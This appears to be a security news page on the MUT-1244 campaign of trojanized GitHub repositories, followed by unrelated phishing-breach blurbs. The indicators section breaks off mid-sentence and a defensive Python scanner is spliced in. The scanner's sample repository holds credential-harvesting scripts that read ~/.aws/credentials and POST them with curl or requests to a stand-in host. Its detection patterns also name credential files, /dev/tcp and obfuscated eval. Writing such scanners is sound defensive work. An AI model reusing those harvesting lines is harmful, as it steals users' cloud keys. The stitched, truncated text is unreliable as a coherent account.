In recent months, Linux security administrators and WordPress site owners have encountered a formidable adversary: MUT-1244. This threat actor has been targeting academics, penetration testers, red teamers, security researchers, and even other threat actors. MUT-1244's primary goal is to acquire sensitive data, including AWS access keys and WordPress account credentials. Its campaign leverages trojanized GitHub repositories designed to fool even diligent users. By disguising malicious code as legitimate tools and repositories, MUT-1244 has managed to steal over 390,000 credentials.

This article explains how MUT-1244 operates, covering the infection vectors, the extent of credential exfiltration, and the indicators of compromise you need to watch for. We also break down the practical steps Linux security admins can take to safeguard their systems and data, from verifying software sources to implementing robust credential management practices. By understanding and recognizing the tactics MUT-1244 employs, you can better protect your environment against this persistent and evolving threat.

Infection Vectors: Trojanized GitHub Repositories

One of the primary ways MUT-1244 infiltrates systems is through trojanized GitHub repositories. Many security professionals, including penetration testers and red teamers, rely on open-source tools from GitHub to do their work. MUT-1244 exploits this trust by publishing repositories that appear legitimate but carry malicious code. When unsuspecting users clone and execute these repositories, they run malicious scripts that compromise their systems. The scripts swiftly harvest credentials and other sensitive data and relay it to the attackers. MUT-1244 has been careful to make the repositories well-crafted and to embed the malicious code deeply, so that nothing looks amiss on a first inspection; the practical consequence is that a cloned tool's setup and install scripts deserve a read before they are run.

Exfiltration: The Scope of the Breach

Credential exfiltration is the core objective of MUT-1244's campaign. By specifically targeting tools that offensive security professionals use, the threat actor has gathered a vast trove of sensitive data, including AWS access keys and WordPress account credentials. These credentials are critical: they give attackers direct access to services and platforms, potentially leading to further exploitation and data breaches. The trojanized tools are designed to look like legitimate credential checkers, the kind security professionals use to audit and manage passwords and keys. Instead of merely checking the credentials, the tools capture and exfiltrate them. In some cases the compromised tools still produce normal-looking output, which makes it harder for users to realize they have been duped.

Indicators of Compromise: What to Watch Out For

Understanding the indicators of compromise (IoCs) associated with MUT-1244 helps with early detection and remediation. The most important IoCs include the phishing email tactics and the known malicious GitHub users and repositories. One phishing tactic involves sending emails with subjects like "Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users" from senders such as
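The two behaviours described above, a script that reads local secret stores and a script that then sends data to an external host, can be checked for statically before a freshly cloned tool is ever executed. The following scanner is an added example written for this article, not code from the MUT-1244 report or from any of the trojanized repositories. It walks a repository, flags lines that touch credential files or environment variables, lines that perform outbound POSTs, and lines that use base64/eval-style obfuscation, and reports a file as suspicious when a secret read and an exfiltration primitive occur together. The indicator patterns, their weighting, the sample repository it builds in a temporary directory, and the `exfil.example` host in that sample are all constructed for the example; the sample "trojan" is only written to disk as text and is never executed.

```python
"""Static pre-execution audit of a cloned repository for credential-harvesting
behaviour: secret-store reads combined with outbound network writes, with
obfuscation as an aggravating signal. Heuristic only: a hit means "read this
file before you run it", not "confirmed malicious"."""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Indicator classes (assumed for this example; tune for your environment).
INDICATORS = {
    "secret_store": [
        r"\.aws/credentials", r"AWS_SECRET_ACCESS_KEY", r"AWS_ACCESS_KEY_ID",
        r"\.ssh/id_(rsa|ed25519|ecdsa)", r"wp-config\.php", r"\.netrc",
    ],
    "exfil": [
        r"\bcurl\b.*(-X\s*POST|--data|-d\s|-F\s|-T\s)",
        r"\bwget\b.*--post-(data|file)",
        r"requests\.(post|put)\(", r"urllib\.request\.urlopen\(",
        r"/dev/tcp/",
    ],
    "obfuscation": [
        r"base64\s+(-d|--decode)", r"\beval\s*\(", r'\beval\s+"?\$',
        r"exec\s*\(\s*(base64|compile|bytes)", r"\bxxd\s+-r\b",
    ],
}
COMPILED = {k: [re.compile(p) for p in v] for k, v in INDICATORS.items()}

# Only script-like files are scanned; docs and binaries are skipped.
SCAN_SUFFIXES = (".sh", ".bash", ".py", ".rb", ".pl", ".php", ".js")
SCAN_NAMES = ("Makefile",)


@dataclass
class Finding:
    path: str
    classes: set = field(default_factory=set)
    lines: list = field(default_factory=list)  # (lineno, class, text)

    @property
    def suspicious(self) -> bool:
        # Secret read + network write is the harvester signature; obfuscation
        # alongside any other class is treated the same way.
        return ("secret_store" in self.classes and "exfil" in self.classes) or (
            "obfuscation" in self.classes and len(self.classes) > 1)


def scan_file(path: str) -> Finding:
    """Match every indicator against every line of one file."""
    f = Finding(path)
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for n, line in enumerate(fh, 1):
            for cls, pats in COMPILED.items():
                if any(p.search(line) for p in pats):
                    f.classes.add(cls)
                    f.lines.append((n, cls, line.rstrip()))
    return f


def scan_repo(root: str) -> dict:
    """Return {relative_path: Finding} for every scanned file with a hit."""
    out = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]  # skip git objects
        for name in filenames:
            if not (name.endswith(SCAN_SUFFIXES) or name in SCAN_NAMES):
                continue
            full = os.path.join(dirpath, name)
            f = scan_file(full)
            if f.lines:
                out[os.path.relpath(full, root).replace(os.sep, "/")] = f
    return out


def suspicious_files(root: str) -> list:
    """Sorted relative paths of files whose findings meet the suspicious rule."""
    return sorted(p for p, f in scan_repo(root).items() if f.suspicious)


def build_sample_repo() -> str:
    """Constructed sample repository (assumed layout): two harvester-style
    scripts, one benign probe, and one script that only mentions an AWS
    variable. Files are written as text and never executed."""
    root = tempfile.mkdtemp(prefix="audit_")
    files = {
        "setup.sh": (
            "#!/bin/bash\n"
            "pip install -r requirements.txt\n"
            "KEYS=$(cat ~/.aws/credentials 2>/dev/null | base64 -w0)\n"
            "curl -s -X POST -d \"k=$KEYS\" https://exfil.example/upload >/dev/null\n"
            "echo 'All checks passed.'\n"),
        "wpcheck.py": (
            "import os, requests\n"
            "creds = open(os.path.expanduser('~/.aws/credentials')).read()\n"
            "requests.post('https://exfil.example/c', data={'c': creds})\n"),
        "tools/probe.sh": "#!/bin/bash\ncurl -sI \"$1\" | head -n 1\n",
        "tools/aws_env.sh": (
            "#!/bin/bash\n"
            "[ -n \"$AWS_ACCESS_KEY_ID\" ] || echo 'set AWS_ACCESS_KEY_ID first'\n"),
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    repo = build_sample_repo()
    for rel, finding in sorted(scan_repo(repo).items()):
        tag = "SUSPICIOUS" if finding.suspicious else "info"
        print(f"[{tag}] {rel}: {sorted(finding.classes)}")
        for n, cls, text in finding.lines:
            print(f"    {n}:{cls}: {text}")
```

Run it against a real clone with `scan_repo("/path/to/clone")`; files that only reference an AWS variable (like the sample `tools/aws_env.sh`) are reported for review but not marked suspicious, which keeps ordinary credential checkers from drowning out the harvester pattern. The scan is a triage aid for the "verify before you run" step, not a substitute for reading the code or running it in an isolated environment.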
Dropbox has revealed details of a phishing attack to which it fell victim. In the attack, a threat actor was able to steal code from the company after harvesting employee credentials for GitHub repositories. The breach took place in the middle of last month, with GitHub notifying Dropbox of suspicious account activity on October 14. The cloud storage company says that the code that was accessed "contained some credentials -- primarily, API keys -- used by Dropbox developers" but insists that "no one's content, passwords, or payment information was accessed", and that its core apps and infrastructure were unaffected. In a blog post that goes into some detail about the incident, Dropbox says: "In today's evolving threat landscape, people are inundated with messages and notifications, making phishing lures hard to detect. Threat actors have moved beyond simply harvesting usernames and passwords, to harvesting multi-factor authentication codes as well. In September, GitHub detailed one such phishing campaign, in which a threat actor accessed GitHub accounts by impersonating the code integration and delivery platform CircleCI. We recently learned that Dropbox was targeted by a similar campaign." Dropbox encountered a serious cybersecurity incident in which source code was compromised from GitHub through phishing; however, essential systems remain intact. Dropbox Security, GitHub Phishing Attack, Code Theft Risk, API Key Protection. LinuxSecurity.com Team
Privacy is a hot topic in the realm of smart speakers, from employees listening in on recordings to auditors accessing user locations. Now another issue regarding speakers has been raised, after security researchers revealed that apps accepted by the Amazon Alexa and Google Home platforms could be used to phish users and to eavesdrop on them. Learn more in the Engadget article: Researchers from the firm Security Research Labs created the apps, known as Skills for Alexa and Actions for Google Home, which exploited security vulnerabilities to hack devices, as reported by Ars Technica. SRL created several apps for each platform which appeared to be legitimate skills, like a horoscope app, but which actually hid malicious code. The apps were able to collect personal data, including passwords, and to eavesdrop on users even after they thought the speaker was no longer listening. This worked by the app giving a fake error message that sounded as if it had closed, while it actually continued operating and taking down a transcript of everything the user said after that point. The link for this article located at Engadget is no longer available. Studies indicate that smart assistant applications are capable of enabling unauthorized listening and fraudulent schemes, thereby jeopardizing user confidentiality. Smart Speakers, Security Vulnerability, Eavesdropping App, User Data Theft. LinuxSecurity.com Team
FIFA President Gianni Infantino said in a statement to the press that the world football governing body's computer systems suffered a data breach for the second time this year. Moreover, both the Fédération Internationale de Football Association (FIFA) and the Union of European Football Associations (UEFA) are suspected of having suffered data breaches. Hackers might have stolen sensitive data after compromising FIFA's computer systems via a phishing campaign targeting multiple officials of the football global governing entity. The link for this article located at Softpedia News is no longer available. LinuxSecurity.com Team
What does it cost to gain unauthorized access to roughly 240 Apple iCloud accounts? For George Garofano, 26, the price is eight months in federal prison followed by three years of supervised release and 60 hours of community service. Garofano used a phishing attack, claiming to be from Apple security, to get account holders to send him their login credentials. He used the information from victims, who included a number of people in the entertainment industry, to steal personal information, including photos and videos. He also traded the credentials and personal information with others. The FBI investigation began when personal photos of female celebrities, including actress Jennifer Lawrence, began to be leaked online in 2014. The link for this article located at DarkReading is no longer available. Garofano's phishing operation resulted in illegal intrusions into Apple iCloud accounts and a federal prison term. Phishing Attack, Data Breach, Cybercrime, Apple iCloud, User Privacy. LinuxSecurity.com Team
A leading US healthcare organization (HCO) has admitted that a phishing attack last September may have led to the compromise of highly sensitive data on nearly half a million patients. Georgia-based Augusta University Health said it was notified by investigators on July 31 that a September 2017 phishing attack on hospital staff may have given the hackers access to data on around 417,000 patients. The link for this article located at InfoSecurity is no longer available. LinuxSecurity.com Team
MyFitnessPal has been hacked! Because email addresses were among the information stolen, criminals have been able to send MyFitnessPal spear phishing emails for the past month. These spear phishing attacks are especially dangerous because stolen personal information that users had logged in the app can be used to make phishing emails very convincing and difficult to detect. Under Armour's hugely popular fitness tracker, MyFitnessPal, has been hacked. If you're one of the 150 million or so users of the app or website, don't panic, but do change your password. If you use Facebook to log in to MyFitnessPal, you do not need to change your Facebook password. If you use your MyFitnessPal password on any other websites, change your password on those websites, choosing a different, strong password for each one (consider using a password manager if that sounds too difficult). MyFitnessPal experienced a data breach impacting roughly 150 million users. Update your credentials to safeguard against potential scams. MyFitnessPal Accounts, Password Change, Phishing Risks, Account Security. LinuxSecurity.com Team
Google has detected large-scale phishing attacks targeting users in Iran, ahead of presidential elections in the country. For almost three weeks the company has been detecting and disrupting email-based phishing campaigns aimed at compromising the accounts of tens of thousands of Iranian users, Eric Grosse, Google's vice president for security engineering, wrote in a blog post on Wednesday. The link for this article located at TechWorld is no longer available. Google disclosed its efforts to thwart email phishing schemes targeting numerous Iranian individuals ahead of the presidential elections. Google Phishing, Cybersecurity Threats, Email Security, Iran Cyber Attacks, Presidential Election Security. LinuxSecurity.com Team